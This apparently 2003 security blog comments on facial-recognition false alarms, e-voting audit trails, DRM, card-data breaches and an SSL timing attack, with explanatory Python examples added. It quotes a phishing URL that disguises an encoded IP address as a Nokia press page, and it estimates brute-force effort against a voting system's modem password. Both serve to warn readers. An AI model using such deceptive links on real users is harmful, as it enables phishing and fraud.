Commentary: Can Microsoft be secure? | CNET News.com

Customers worry about Microsoft's security: Seventy-seven percent of respondents to a Forrester survey cited security as their top concern about deploying Windows. Despite those concerns, 89 percent of users are still deploying sensitive applications like financial transaction systems and medical records databases on Windows.


[IP] NIST rates facial recognition systems

"The three top-rated systems verified identities correctly 87 percent to 90 percent of the time with a false-alarm rate of 1 percent. When NIST specified a false-alarm rate of 0.1 percent, the success rate dropped to between 79 percent and 82 percent."

From the report itself:

"Typically, the watch list task is more difficult than the identification or verification tasks alone. Figure 8 shows detection and identification rates for varying watch list sizes at a false alarm rate of 1%. For the best system using a watch list of 25 people, the detection and identification rate is 77%. Increasing the size of the watch list to 3,000 people decreases the detection and identification rate to 56%."

This means that such systems would still finger plenty of innocent people as terrorists. The false alarm rate applies to everyone screened, not just to the people on the list, and in any real deployment the innocent outnumber the targets by orders of magnitude, so the false alarms swamp the true hits.

A practical, statistical look at the civil rights implications of this problem, endemic to the NCIC database as well, can be found in the April 2003 Crypto-Gram.
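To put numbers on the base-rate problem, here is a small calculator I added for this post (my own example, not from the NIST report or Crypto-Gram). It takes the report's two operating points (77% detection for a 25-person list, 56% for 3,000, both at a 1% false alarm rate) and applies them to a constructed scenario; the traveller counts and the number of genuinely listed people are assumptions for illustration, not data from the report.

```python
def screening_outcomes(screened: int, on_list: int,
                       detection_rate: float, false_alarm_rate: float) -> dict:
    """Expected alerts from one screening run.

    screened          faces checked against the watch list
    on_list           how many of those faces really belong to listed people
    detection_rate    fraction of listed people the system flags (NIST: 0.77 for a
                      25-person list, 0.56 for 3,000 people, both at 1% false alarms)
    false_alarm_rate  fraction of *non-listed* faces the system flags anyway
    """
    true_alerts = on_list * detection_rate
    false_alerts = (screened - on_list) * false_alarm_rate
    total = true_alerts + false_alerts
    return {
        "true_alerts": true_alerts,
        "false_alerts": false_alerts,
        # precision: of everyone pulled aside, the fraction who were really on the list
        "precision": true_alerts / total if total else 0.0,
    }


def false_alarm_rate_for_precision(target_precision: float, screened: int,
                                   on_list: int, detection_rate: float) -> float:
    """Solve precision = TP / (TP + FP) for the false-alarm rate FP / (screened - on_list)
    a system would need before its alerts were mostly real."""
    true_alerts = on_list * detection_rate
    allowed_false = true_alerts * (1.0 - target_precision) / target_precision
    return allowed_false / (screened - on_list)


if __name__ == "__main__":
    # Constructed scenario (an assumption, not from the NIST report): 100,000 travellers
    # screened in a day, 10 of whom are genuinely on the watch list.
    for list_size, rate in ((25, 0.77), (3000, 0.56)):
        r = screening_outcomes(100_000, 10, rate, 0.01)
        print(f"list of {list_size:>5}: {r['true_alerts']:.1f} real hits, "
              f"{r['false_alerts']:.0f} innocents flagged, precision {r['precision']:.2%}")
    need = false_alarm_rate_for_precision(0.5, 100_000, 10, 0.56)
    print(f"for half the alerts to be real at 56% detection, "
          f"false alarms must be <= {need:.4%}")
```

With those assumptions the 3,000-person list yields about 5.6 real hits against roughly 1,000 innocent people flagged per day, and for even half the alerts to be genuine the false alarm rate would have to fall to about 0.0056%, well below the 0.1% setting NIST tested.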

In related news, from an earlier Crypto-Gram:

"The SmartGate facial recognition trial at Sydney Airport has suffered an embarrassing setback, when two Japanese visitors fooled the system simply by swapping passports.
http://email.ni.com.au/Click?q=aa-gBTeQXUc2wTVl8iWEhuEcIDY"


Software quality, especially input filtering, is critical for mobile devices, particularly devices that do not typically have user-updateable software.

News: Mobile phone hacking expected to spread

United States-based security company @stake has released a security advisory detailing a Denial of Service (DoS) vulnerability in the Nokia 6210 GSM mobile phone, and although the flaw isn't serious it could be a sign of worse things to come.


This analysis shows how DRM solutions are ineffective because they [attempt to] address the wrong threat model.

"Many DRM advocates make the classic mistake of refusing to choose a threat model. When they complain about the problem, they seem to be using the Napsterization model -- they talk about one infringing copy propagating across the world. But when they propose solutions they seem to be solving the casual-copying problem, asking only that the technology keep the majority of customers from ripping content. So naturally the systems they are building don't solve the problem they complain about."

Freedom To Tinker: DRM, and the First Rule of Security Analysis


Evidence of the damage that insider attacks can wreak. Ironically, the victim was a security software distributor.

It's unbelievable how often I hear things like:

"Well you have to trust your employees/administrator/etc!"
"But we're behind the firewall!"

I even noticed Microsoft's STRIDE threat model does not include the threat:

Misuse of granted privileges.

Whoops. People all too often don't look inside their own organizations at the threats all around them. Insiders are a difficult, and perhaps not entirely solvable, problem. It is much easier for someone to attack your network when they are already on it than to come through your firewall from the Internet. Your firewall rejects access, but then your HR department grants it, and will even give a potential adversary a computer, a cubicle, network access, a badge, etc.!

You have to consider this angle in your designs, in how you manage privileges and in how you maintain audit trails.

"Security software distributor, Janteknology, has shut down amidst dramatic circumstances, its battle to survive tough market conditions ended by industrial sabotage."

News: Security firm shuttered by sabotage


USACM co-chair Barbara Simons spoke out against sections of the DMCA during recent Congressional review of the DMCA's anti-circumvention provisions.

ACM MemberNet

You can also read the transcript of Simons' testimony

"During a time when our nation is devoting unprecedented resources to homeland security, we should be eliminating laws such as the DMCA that encourage insecurity,"


Here is a 176-page PDF paper on the fallacy of polygraph exams (a.k.a. "lie" detectors). I have not read up on this subject in some time but this looks to be a good read.

Lie Behind the Lie Detector


Found out about this great site through this month's Crypto-Gram newsletter. It posts articles on -- you guessed it -- all the stupid security measures people come across.

Stupid Security: Exposing Fake Security Since 2003


A great article with some perfect quotes from leading advocates and experts for voter verifiable audit trails. Also, there are some documented cases of voting machine errors in the article.

New Voting Systems Assailed

New Voting Systems Assailed
Computer Experts Cite Fraud Potential

By Dan Keating
Washington Post Staff Writer
Friday, March 28, 2003; Page A12

As election officials rush to spend billions to update the country's
voting machines with electronic systems, computer scientists are
mounting a challenge to the new devices, saying they are less reliable
and less secure from fraud than the equipment they are replacing.

...

"These systems, because of the level of testing they go through, are
the most reliable systems available," said Michael Barnes, who oversaw
Georgia's statewide upgrade. "People were happy with how they
operated."

....

But the scientists' campaign, which began in California's Silicon
Valley in January, has gathered signatures from more than 300 experts,
and the pressure has induced the industry to begin changing course.

....

Critics of such systems say that they are vulnerable to tampering, to
human error and to computer malfunctions -- and that they lack the
most obvious protection, a separate, paper receipt that a voter can
confirm after voting and that can be recounted if problems are
suspected.

Officials who have worked with touch-screen systems say these concerns
are unfounded and, in certain cases, somewhat paranoid.

David Dill, the Stanford University professor of computer science who
launched the petition drive, said, "What people have learned
repeatedly, the hard way, is that the prudent practice -- if you want
to escape with your data intact -- is what other people would perceive
as paranoia."

Other computer scientists, including Rebecca Mercuri of Bryn Mawr
College, say that problems are so likely that they are virtually
guaranteed to occur -- and already have.

...

"If the only way you know that it's working incorrectly is when
there's four votes instead of 1,200 votes, then how do you know that
if it's 1,100 votes instead of 1,200 votes? You'll never know," said
Mercuri.

Because humans are imperfect and computers are complicated, said Ben
Bederson, a professor of computer science at the University of
Maryland, mistakes will always be made. With no backup to test, the
scientists say, mistakes will go undetected.

"I'm not concerned about elections that are a mess," Dill said. "I'm
concerned about elections that appear to go smoothly, and no one knows
that it was all messed up inside the machine."

"We're not paranoid," said Mercuri. "They're avoiding computational
realities. That's the computer science part of it. We can't avoid it
any more than physical scientists can avoid gravity."


"Nokia 7650 upgrade - hoax

An internet hoax is traveling round the internet that purports to be a press release from Nokia offering an upgrade for owners of the Nokia 7650 handset to support a series of new features.

The press release says that "Nokia today announced after months of speculation and rumours that it will be re-releasing its flagship Symbian OS phone, the 7650, with the long awaited increased memory capabilities.

The new 7650 will remain branded as 7650 but will have the added feature of an MMC expansion bay and support for Bluetooth Audio."

There is a web site address for the press release, that at first look, does look like a Nokia web site address - but the @ symbol in the middle of the URL actually causes browsers to ignore everything before it, and the remainder of the address is a web page on a totally different server. "

One of the URLs looks like this, so you can see how someone could easily be tricked into believing it is legitimate:

http://press.nokia.com~id=@%31%39%34%2e%31%36%34%2e%32%30%2e%38/release/7650.htm

The page no longer works, but you need to be very diligent online and can't trust everything you read. Someone could easily hide this URL behind innocuous link text so you would not notice the underhandedness: Nokia fake press release

Read more about these same techniques that spammers often use to trick you at Stupid Spam Tricks.
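Here is a small checker I added to show what is going on in that URL (my own example code, not from the hoax, Nokia, or the Stupid Spam Tricks page). Everything before the "@" in the authority part of a URL is the userinfo field, not the host, and the host after it can be written with %xx escapes, which is how "%31%39%34%2e..." hides the address 194.164.20.8. The function undoes both tricks and flags a URL whose userinfo field reads like a domain name; the regex used for "looks like a hostname" is my own heuristic.

```python
import ipaddress
import re
from urllib.parse import urlsplit, unquote

# A userinfo field that itself reads like a domain name is the hallmark of the trick.
# Heuristic chosen for this example: two or more dot-separated labels.
_LOOKS_LIKE_HOSTNAME = re.compile(r"^[a-z0-9-]+(\.[a-z0-9-]+)+", re.IGNORECASE)


def real_destination(url: str) -> dict:
    """Report where a URL really points, undoing the two tricks in the hoax:
    a decoy domain placed in the userinfo field before '@', and a percent-encoded
    host after it (%31%39%34 == '194', and so on)."""
    parts = urlsplit(url)
    userinfo, has_at, hostport = parts.netloc.rpartition("@")
    hostport = unquote(hostport)               # decode %xx escapes in the host part
    host, _, port = hostport.partition(":")
    host = host.lower()
    try:
        ipaddress.ip_address(host)
        host_is_ip = True
    except ValueError:
        host_is_ip = False
    return {
        "host": host,
        "port": port or None,
        "userinfo": userinfo if has_at else None,
        # deceptive: userinfo is present and looks like a domain someone might trust
        "deceptive": bool(has_at) and bool(_LOOKS_LIKE_HOSTNAME.match(userinfo)),
        "host_is_ip": host_is_ip,
        "path": parts.path,
    }


def describe(url: str) -> str:
    """One-line human summary, the kind of text a mail gateway might substitute for a link."""
    d = real_destination(url)
    where = d["host"] + (f":{d['port']}" if d["port"] else "") + d["path"]
    if d["deceptive"]:
        return f"WARNING: looks like {d['userinfo']} but actually goes to {where}"
    return f"goes to {where}"


if __name__ == "__main__":
    hoax = "http://press.nokia.com~id=@%31%39%34%2e%31%36%34%2e%32%30%2e%38/release/7650.htm"
    for u in (hoax, "https://www.nokia.com/release/7650.htm", "http://user:secret@api.example.com:8080/v1"):
        print(describe(u))
```

For the hoax URL the checker reports a host of 194.164.20.8 with "press.nokia.com~id=" as the decoy userinfo. A URL with ordinary credentials ("user:secret@...") is not flagged, because the heuristic only fires when the userinfo part looks like a domain. Current browsers either strip userinfo from the address bar or prompt before sending it, but link previews, mail clients and log parsers still see the raw string, so it is worth normalising links this way before trusting what they appear to say.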


A press release on RSA's website announces that a unanimous verdict was reached on all infringement claims in favor of the defendants, RSA Security Inc. and Verisign Inc.

RSA Security | RSA Security Wins SSL Patent Infringement Trial


Rob Slade takes an in-depth look at what the National Cybersecurity Strategy is for security education and doesn't really find much. To summarize:

"we [the U.S. Gov't] can't do it alone, so we're not going to do anything"

"How will it happen?"

"Focus or force?"

"Security awareness cannot be promoted by establishing contests where nobody will compete."

"Again, this proposal sounds good, but, without details to back it up, I doubt that there will be any impact any time soon"

"Subject to budget considerations. No further comment needed."

"What incentive do those companies have to do so? "

"How about funding?"

"OK, the government doesn't want to help or fund certification, but wants to dictate what the certification is for."

"I imagine AV and firewall vendors will be delighted that the government will be advertising for them"

The document seems to say a lot but does not seem as if it will actually do anything.

Read the full analysis in Risks 22.63, article 1


There was voluminous and heated discussion on the cryptography mailing list about the dangers of the paper audit trail for e-voting that is being pushed by the e-voting academic experts. The instigator and perpetuator of the discussion was Ed Gerck.

His main criticism was that the paper audit trail does not address the problems of massive external vote tampering by extortion (vote this way and prove you voted this way or I'll kill you) or vote selling (vote Republican, prove it to me, and I'll pay you $$). He is afraid that the paper audit trail will be just the thing that can be photographed as proof of your vote to enable such schemes.

Rebecca Mercuri replied:

"The whole idea of photographing paper ballots is a straw man. It is akin to saying that people will just run through red lights anyway so we shouldn't place them at intersections."

This seemed to sum up my thoughts on the complaint. He seemed to be arguing for throwing the baby out with the bathwater, saying "[printing paper receipts] creates problems that are even harder to solve than the silent subversion of e-records"

He included criticism later on that a paper audit trail does not really make e-voting systems any better than existing paper-based systems and seemed to argue that it is academically uninteresting. I think that this is exactly the point though: nobody has yet come up with an entirely electronic voting system that solves the fundamental problem that a paper audit trail solves. It may be unsatisfying, but what I think is far more unsatisfying are the voting districts that are ignoring this academic result and swapping out systems with unverifiable ones. People need to understand the limits and risks of electronic systems.

Rebecca's most interesting statement for me was:

"The salient requirement of Democratic elections is that the voters must be assured that their ballots are recorded and tabulated as cast. If the process is such that it can only be understood by a team of scientists with Ph.D.'s, the average citizen can have no confidence that their voice is being heard."

She ended her posting with a response to the criticism:

"I have never said that the paper balloting solution is a perfect one, but it provides assurances in a human-accessible format that is a considerable improvement over both the black-box systems and the chad-based ones. If you can devise a system that is equally user-friendly and has the same ability for independent auditing, then please do so."

The discussion ended with that.


I will have to check this out. Although, I have several piles of other publications to whittle down first.

"The IEEE Computer Society has created a new magazine called "Security and Privacy" specifically for the security community. The magazine intends to present a balanced mix of scientific research and practical security discussion."


This story about 16M yen (~$136,000) stolen from someone's CityBank online banking account, after the user's password was captured at an Internet cafe, highlights the tremendous risk of insecure client computers. It does not make a darned bit of difference what crypto strength you use: installing a keystroke capture device that nobody would ever notice is trivial, and it catches everything before it is encrypted.

"Using encryption on the Internet is the equivalent of arranging an armored car to deliver credit-card information from someone living in a cardboard box to someone living on a park bench." -- Gene Spafford

The trend toward SSL-based VPNs and Internet-enabling everything under the sun leads to uncontrolled client-side access that significantly increases this risk. Gartner is "bullish" on SSL-based VPNs, but I'm not convinced that their convenience outweighs the increased risk in many cases. You would need to deploy token authentication at a minimum with these solutions, and you would still be at risk of general data compromise: a one-time token stops password replay, but not a keylogger or screen capture of whatever the user views during the session. In any company with a large number of employees, training everyone not to use a personal computer, a library computer, an Internet cafe computer, etc. to access such a solution would be difficult and not entirely effective. Users will choose convenience over security much (all?) of the time.

Full story below and at CNN.com


From RISKS 22.61.

"A Krispy Kreme doughnut shop in Albuquerque seemingly greased its coffers while figuratively deep-frying over two dozen customers. Irrespective of what they ordered, each of 28 customers using a credit card was charged EXACTLY $84,213.60 for the purchase. "

The PGN comments simply made the posting though:

[These charges were actually APPROVED, and of course also blew the customers' credit ratings for a few days. Amazing! "The $84,000 charge, were it legitimate, would have purchased over 170,000 ... doughnuts, enough to stretch over 9 miles if placed end-to-end." ...


BlackBox Voting is reporting on a whistleblower lawsuit filed here in Washington state by a software engineer against his former employer VoteHere. He alleges that he was wrongfully terminated to silence his complaints while third party "certification" of the VoteHere system was being conducted. The lawsuit enumerates many of the system's flaws that he documented in defect reports. It is a must-read.

In other unbelievable news, Santa Clara County, CA and Collins County, TX both voted for electronic voting machines without paper audit trails against all sound advice from experts around the world. Santa Clara County reportedly cited the same kinds of "certifications" as evidence that the system is okay without the voter verifiable audit trail.


Many of the attacks described are social engineering attacks, not computer security holes. I can't believe the mumbling attacks--hilarious! Social engineering attacks are very hard to defend against, especially with huge call centers like AOL must have.

AOL customers beware your privacy. AOL not only makes it easy to get on the Internet, they make it easy for others to get on the Internet as you too!

"Using a combination of trade tricks and clever programming, hackers have thoroughly compromised security at America Online, potentially exposing the personal information of AOL's 35 million users. "

Wired News: Hackers Run Wild and Free on AOL


The March 3 Security Wire Digest and Reuters are reporting that:

"Leon Stambler, who has won financial settlements from companies such as National Cash Register, First Data and Openwave Systems, seeks up to $20 million in the federal suit, being heard in Delaware. "

"Certicom and Openwave each paid $400,000 plus ongoing royalty fees for their licenses and First Data paid $4 million, he testified. "

He is suing RSA Security and Verisign now, trying to extract money. Ugh.

The companies are arguing that his invention (patented in 1992) is distinct from SSL. SSL was developed in 1994 and patented in 1997, according to the Reuters article.

The Reuters story is here


"Two Alberta men with a passion for locating and mapping wireless computer networks have come under the scrutiny of Canada's spy agency."

"The press release, which also included Mr. Kaczor's name and contact information, featured the tongue-in-cheek headline "Wireless hackers invade Red Deer!""

High-tech hobby falls under CSIS suspicion


[IP] Pondering Value of Copyright vs. Innovation

"Technology scholars, business leaders and policy makers gathered at California conferences this weekend to argue whether a mismatch between two different technologies and the legal policies that govern them could inhibit free expression and innovation. "

""We have ceded too much power to copyright owners," said Ms. Lofgren, who plans on Tuesday to reintroduce a bill that would amend the 1998 law. "People are afraid to proceed on innovative measures.""


Among other nasty things, the US government is trying to make the use of encryption while committing a crime over a computer a new crime that would add 5 years onto your sentence, if convicted.

"If you order a book from Amazon.com and fail to pay state tax, the SSL session with Amazon supports a five year felony. [RFF - I'd also include using GSM cell phones with the built-in encryption....]"

The ACLU has a section-by-section analysis for the full dose of insanity.

[IP] Outlawing Encryption under PATRIOT II

Several members of Congress have sent an open letter to John Ashcroft chiding him for the administration's handling of PATRIOT II. The Justice Department is being very secretive about the new act, even lying to Congress about its existence though it has already been leaked on the Internet.

From the FoxNews story:

"If there's going to be a sequel let's find out what it's going to be" before reading about it in the newspapers, Leahy said, accusing the Justice Department of lying to his staff about whether a new bill was in the works.


Keep this handy for the next MS worm. Posted to RISKS 22.53:
[From Pete Lindstrom, Spire Security, petelind@spiresecurity.com]

*<adjective> Computer Worm <verb> Internet*

In the wee hours of <date>, a <adjective> computer worm spread <adverb>
throughout the Internet. Dubbed <silly name> because <ridiculous reason
that doesn't explain anything about how it works>, and also known as
<another random name> and <another random name>, the worm has infected
an estimated <number> systems within <length of time>. Experts are
calling this worm the most <adjective> since <date in the past>.

The worm exploits a hole in <Microsoft product name> that was first
identified <number> months ago by <security company name>...


The BSA (Business Software Alliance) has now taken to sending out threatening letters based on the results of a web/ftp spider search for the word "Office". The RIAA has done similar things, searching for "pirated" music by keyword and then mailing automatically.

From the BSA letter:

"What was located as infringing content:
------------------------------
Filename: /mandrake_current/SRPMS/OpenOffice.org-1.0.1-9mdk.src.rpm (199,643kb)
Filename: /mandrake_current/i586/Mandrake/RPMS/OpenOffice.org-libs-1.0.1-9mdk.i586.rpm (35,444kb)"

OpenOffice.org thread

Anyone have a clue stick handy?


tecChannel reverse-engineered Windows Update and found that it can report on other installed applications. It is unclear whether it actually does so, although an article at The Inquirer claims as much.

They are offering a utility that you can run yourself to spy on the spyware. You have to pay 1.99 Euro for the full article, which includes the software. A summary can be found for free at The Inquirer.

"The information can pass on to Microsoft a list of all of the software installed on an individual's computer, including software manufactured by other manufacturers."

There is a slashdot story as well.

An article update shows a dump of what a hardware configuration looks like being sent to Microsoft.


Just heard an NPR story on the Santa Clara e-voting saga. A vote today did not decide whether they would only go with a system that has a paper ballot, only whether to test such a system.

The representative of Sequoia (the company whose product was chosen) admitted that they only agreed to add the paper ballot because they listen to customer demands. He didn't think it was necessary though.

"Officials in California's Santa Clara County learn that those who know computers best have the biggest concerns about them. That county, home to Silicon Valley, is deciding on an electronic voting system. But a computer scientist fights to keep old-fashioned paper in the voting process. NPR's Andy Bowers reports."

Listen here:
Real Audio link

Check out the 128 pages of documentation. Page 13 is interesting, as is the discussion on page 23 that the "prevailing view is that proprietary source code should not be readily available for obvious security [ed: obscurity] reasons".

Page 27 has a discussion of the "security" for modem data transmissions of vote totals in the ES & S iVotronic product. It's good for a laugh. Here's their modem "security":

1. "Transmission...uses an ES&S proprietary protocol that includes proprietary data format and checking....If a standard PC with a modem attempts to link up with a Data Acquisition Manager (DAM) Host, the modems will initially link up but no intelligible information will be received by either unit."

Don't know about you but that gives me warm fuzzies. Of course this is not unlike things that I see in RFPs for other kinds of technology all the time. You would (and should) expect more from such a critical system though.

2. "To add additional security..." [as if 1 is not enough] "...there is an eight-position password built into the protocol"

They go on to say that a time period--not a number of failed attempts--governs the disconnect if the correct password is not entered. So it sounds like someone could brute-force it, simply redialling after each disconnect. Is the 8-position password numeric only, or does it include alpha too?
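To show why a time window without a failure counter does not stop brute force, here is a small estimator I added for this post (my own example; the connect-window, redial and lockout figures are assumptions for illustration and are not taken from the ES&S document). It compares an 8-position password under two policies: the document's "drop the line after a time period" rule, and an ordinary "lock out after N wrong guesses" rule, for both a numeric and an alphanumeric alphabet.

```python
import math


def brute_force_estimate(alphabet_size: int, length: int,
                         attempts_per_second: float, policy: dict) -> dict:
    """Worst-case effort to exhaust a fixed-length password over a dial-in link.

    policy is one of two shapes (constructed for this example):
      {"kind": "time_window", "window_s": W, "reconnect_s": R}
          the line is dropped W seconds after connect unless the password was
          accepted, redialling takes R seconds, and wrong guesses are not counted
      {"kind": "attempt_counter", "max_failures": F, "lockout_s": L}
          after F wrong passwords the account is locked for L seconds
    """
    keyspace = alphabet_size ** length
    if policy["kind"] == "time_window":
        # Nothing stops guessing inside the window; only the redial latency limits rate.
        per_session = int(policy["window_s"] * attempts_per_second)
        session_cost_s = policy["window_s"] + policy["reconnect_s"]
    elif policy["kind"] == "attempt_counter":
        per_session = policy["max_failures"]
        session_cost_s = per_session / attempts_per_second + policy["lockout_s"]
    else:
        raise ValueError("unknown policy kind")
    sessions = math.ceil(keyspace / per_session)
    worst_case_s = sessions * session_cost_s
    return {
        "keyspace": keyspace,
        "attempts_per_session": per_session,
        "sessions": sessions,
        "worst_case_seconds": worst_case_s,
        # on average the right password turns up after half the keyspace
        "expected_years": worst_case_s / 2 / (365 * 86400),
    }


if __name__ == "__main__":
    timed = {"kind": "time_window", "window_s": 60, "reconnect_s": 30}
    counted = {"kind": "attempt_counter", "max_failures": 3, "lockout_s": 900}
    for name, alphabet in (("digits only", 10), ("digits + letters", 36)):
        for label, pol in (("time window", timed), ("attempt counter", counted)):
            e = brute_force_estimate(alphabet, 8, 10.0, pol)
            print(f"{name:17} {label:16} keyspace {e['keyspace']:>16,d}  "
                  f"expected {e['expected_years']:12,.1f} years")
```

With these assumed figures (ten guesses a second, a 60-second window, 30 seconds to redial) an 8-digit numeric password falls in about three months of automated dialling, while a three-strikes lockout of fifteen minutes pushes the same keyspace past four centuries. The alphabet matters too: 36^8 is 2.8 trillion against 10^8, which is exactly why the question "numeric or alphanumeric?" is worth asking. Either way, counting failures is what makes the difference, and that is the control the document does not describe.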

I could go on but don't want to ruin it for you.


I heard someone talk about how in the 50's and 60's everyone was building bomb shelters for protection against nuclear attack and fallout but now people are being told that some tarp and duct tape are all that is needed.

The question was asked, "Who is going to protect us from Tom Ridge, and his bumblers in the Dept of Homeland Security..."

[IP] More bad advice from Tom Ridge...

NPR : Duct and Cover?


"In what is believed to be the biggest credit card hacking incident so far, Omaha-based Data Processors International, which processes transactions involving Visa, MasterCard, American Express and Discover Financial Services for merchants, said in a statement that it had "recently experienced a system intrusion by an unauthorized outside party."

Yahoo! News - FBI Probing Theft of 8 Million Credit Card Numbers


There is a story in this month's ACM MemberNet publication on the ACM's opposition to Total Information Awareness (TIA).

This isn't exactly news, because the ACM letter was drafted on Jan 23. The latest status on the EPIC TIA page was Jan 24, when Amendment 59 was included in a bill to impose limits on TIA. However, the requirement that the government simply provide a report in order to continue funding seems weak. Nothing defines what content within the report would be satisfactory. It sounds too much like corporate privacy policies: it doesn't matter what is in them, so long as the company abides by it. The report could say exactly what privacy advocates fear most and TIA would still be funded. However, the catch-all requiring Congress to approve use of TIA is a step in the right direction.


Santa Clara County faces key decision on electronic ballots

"The future of electronic voting may be rewritten this week in Santa Clara County, where county leaders are weighing warnings that the touch-screen voting machines they want to buy are more prone to error and fraud than the systems they would replace."

"Sequoia's systems don't produce paper ballots that voters can verify, and supervisors didn't ask for such a device in their bid proposal. Vendors and election officials say paper ballots aren't needed because the machines have internal safeguards, are certified by federal and state governments and tested repeatedly before and after elections."

Ack! Read the research! Read my rant! Just stop immediately and don't do anything yet!

"``We still believe they're secure,'' Assistant County Executive Peter Kutras said Friday. ``There are not any issues that should cause concern in terms of voter confidence.'' "

Good Grief.

This is also good press for the petition that David Dill at Stanford began. Hopefully they will listen.


A study of the TCP/IP code of various commercial and open source operating systems found that the defect rate in the Linux implementation was much lower than in the others studied.

"The Linux defect rate was 0.1 defects per 1,000 lines of code, Reasoning found. The rate for the general-purpose operating systems--two of them versions of Unix--was between 0.6 and 0.7 per 1,000 lines of code. The rates for the two embedded operating systems were 0.1 and 0.3 per 1,000 lines of code."

Because of the very limited scope of this audit, and because it is unclear which specific defect classes were being checked out of the set of all possible defects, I would not be so quick to draw sweeping conclusions from it. However, it is very interesting in itself.

Study lauds open-source code quality


From RISKS 25.57.

I have friends who dive and hope to get certified myself soon so this is of particular concern.

Date: 17 Feb 2003 05:35:20 -0800
From: tom.race@skipton.co.uk (Tom Race)
Subject: Scuba diving computer recall

[See also Risks in scuba equipment, Carl Page, RISKS-21.41]

In simple terms, a dive computer monitors the amount of nitrogen dissolved in the diver's blood. Typically worn like a wrist watch, it tracks the diver's depth and calculates the absorbed nitrogen according to a mathematical model of the human body's various tissues.

If a diver surfaces too quickly with too much nitrogen in the body it is released as bubbles within the blood or tissues, potentially causing injury or death through Decompression Sickness (DCS). Divers typically rely heavily on a computer to tell them when to surface to avoid DCS.

The manufacturer below is being sued over the mathematical model, which has a faulty assumption, or more likely a complete oversight. The model embedded in this computer assumes that the diver on the surface continues to breathe whatever gas mixture they were diving with. When the diver is using nitrox, a gas mixture containing extra oxygen and therefore less nitrogen than air, the computer will assume that they are releasing nitrogen at a higher rate than reality. Over several dives and several intervals on the surface, the state of the mathematical model and the diver's actual nitrogen levels may become seriously different, and in the 'wrong' (more risky) direction.

A failure of requirements specification or code inspection? The lawsuit refers to a 'manufacturing defect'.

I have an interest, since I have a nitrox computer from the same manufacturer. Fortunately mine is more recent, and I have not used it for gases other than air.

Tom Race
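The divergence Tom Race describes can be reproduced with a toy model. The following is an added example, not code from the RISKS post or from any dive-computer manufacturer: a single Haldanean tissue compartment with an assumed 40-minute half-time (a constructed value, not taken from any real decompression table) and a constructed profile of 30 m on nitrox 32 for 30 minutes followed by a 60-minute surface interval. It compares the modeled tissue nitrogen when the surface interval is computed with the gas the diver actually breathes (air) against the faulty assumption that the diver keeps breathing the dive gas.

```python
import math

SURFACE_ATA = 1.0      # absolute pressure at sea level, atm
AIR_N2 = 0.79          # nitrogen fraction of air
EAN32_N2 = 0.68        # nitrogen fraction of nitrox 32 (32% O2)
HALF_TIME_MIN = 40.0   # assumed compartment half-time (constructed, not a real table value)


def depth_to_ata(depth_m: float) -> float:
    """Absolute pressure at a given depth in sea water (10 m of water ~ 1 atm)."""
    return SURFACE_ATA + depth_m / 10.0


def tissue_after(p_start: float, p_inspired_n2: float, minutes: float,
                 half_time: float = HALF_TIME_MIN) -> float:
    """Haldane single-compartment update: the tissue N2 partial pressure
    approaches the inspired N2 partial pressure exponentially."""
    k = math.log(2.0) / half_time
    return p_inspired_n2 + (p_start - p_inspired_n2) * math.exp(-k * minutes)


def dive_then_surface(surface_gas_n2: float,
                      depth_m: float = 30.0, dive_min: float = 30.0,
                      dive_gas_n2: float = EAN32_N2,
                      surface_min: float = 60.0) -> float:
    """Tissue N2 (atm) after one dive and one surface interval.

    surface_gas_n2 is the N2 fraction the *model* assumes at the surface.
    The real diver breathes air (0.79); the defect described in the post is
    a model that plugs in the dive gas here instead."""
    p = AIR_N2 * SURFACE_ATA                                   # equilibrated with air before the dive
    p = tissue_after(p, dive_gas_n2 * depth_to_ata(depth_m), dive_min)
    p = tissue_after(p, surface_gas_n2 * SURFACE_ATA, surface_min)
    return p


def model_under_read() -> float:
    """How far the faulty model under-reads the diver's real loading (atm).
    Positive means the computer believes less nitrogen is present than there
    really is, i.e. the error is in the risky direction."""
    actual = dive_then_surface(surface_gas_n2=AIR_N2)
    faulty = dive_then_surface(surface_gas_n2=EAN32_N2)
    return actual - faulty


if __name__ == "__main__":
    print(f"actual (air at surface):    {dive_then_surface(AIR_N2):.3f} atm N2")
    print(f"faulty (nitrox at surface): {dive_then_surface(EAN32_N2):.3f} atm N2")
    print(f"model under-reads by        {model_under_read():.3f} atm")
```

With a lower inspired nitrogen pressure assumed at the surface, the model sees a steeper gradient and off-gasses the compartment faster than the diver's body does; repeat the dive-and-interval cycle and the gap only widens, which is the "seriously different, and in the wrong direction" outcome the post warns about.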


A very short Reuters story dated 2-17-2003 reports that "Over 5 million Visa/MasterCard accounts hacked into":

"More than five million Visa and MasterCard accounts throughout the nation were accessed after the computer system at a third party processor was hacked into, according to representatives for the card association"

This story by the BBC has more details

Great. Why were the account numbers on Internet-accessible systems? And why were the accounts not stored encrypted at the third party?

5 million accounts is about 1% of the 560 million total cards in circulation. This is huge.


From RISKS 22.56

"Date: Thu, 13 Feb 2003 05:46:37 -0500
From: "Rebecca Mercuri"
Subject: Risks of Doing Homework

At the faculty meeting at Bryn Mawr College on 12 Feb 2003, we were informed that a student at Haverford (our affiliated College) was arrested over the weekend when he was trying to do his homework assignment in Philadelphia. As part of the Cities project, he was taking photographs of SEPTA (our regional transit authority) facilities when he was arrested, detained for a few hours, and eventually released. Haverford administration is working to try to ensure that this event not be a part of the student's permanent police record. Apparently taking photographs at transit facilities is cause for arrest during "Code Orange" alert, the authorities explained. Faculty were advised to be careful about assigning "field trip" projects during such alerts.

Rebecca Mercuri, Bryn Mawr Computer Science"


A Wired article describes the unbelievable story of reporter Noah Shachtman trivially breaching the physical security at none other than Los Alamos National Laboratory, described as "the world's most important nuclear research facility".

"On Saturday morning, I slipped into and out of a top-secret area of the lab while guards sat, unaware, less than a hundred yards away."


"In a paper, researchers at the Security and Cryptography Laboratory (Lasec) of the Swiss university EPFL demonstrate a timing-based attack on CBC cipher suites in SSL and TLS.

The attack assumes that multiple SSL or TLS connections involve a common fixed plaintext block, such as a password. Since credit card numbers are normally sent to a secure server only once, this particular attack has little or no chance of success.

When checking email over a secure connection, using for example an Outlook Express 6.x client, passwords are sent periodically as email is checked. This leaves the door open for an attack."

The attack relies on the protocol being a bit too chatty in the information it leaks. There are many limitations that make this not especially critical, although IMAP/POP clients like Outlook exacerbate the risk because they will happily keep resending your encrypted password to the server if the connection does not succeed.

The Register article

Peter Gutmann, of cryptlib fame, posted some client-side coding suggestions to ensure that you are not at risk, regardless of whether your server is vulnerable or not:

- Don't retry a connection repeatedly if it fails the first time (I guess you don't do that anyway, but some programs like Outlook try automated repeated connects).

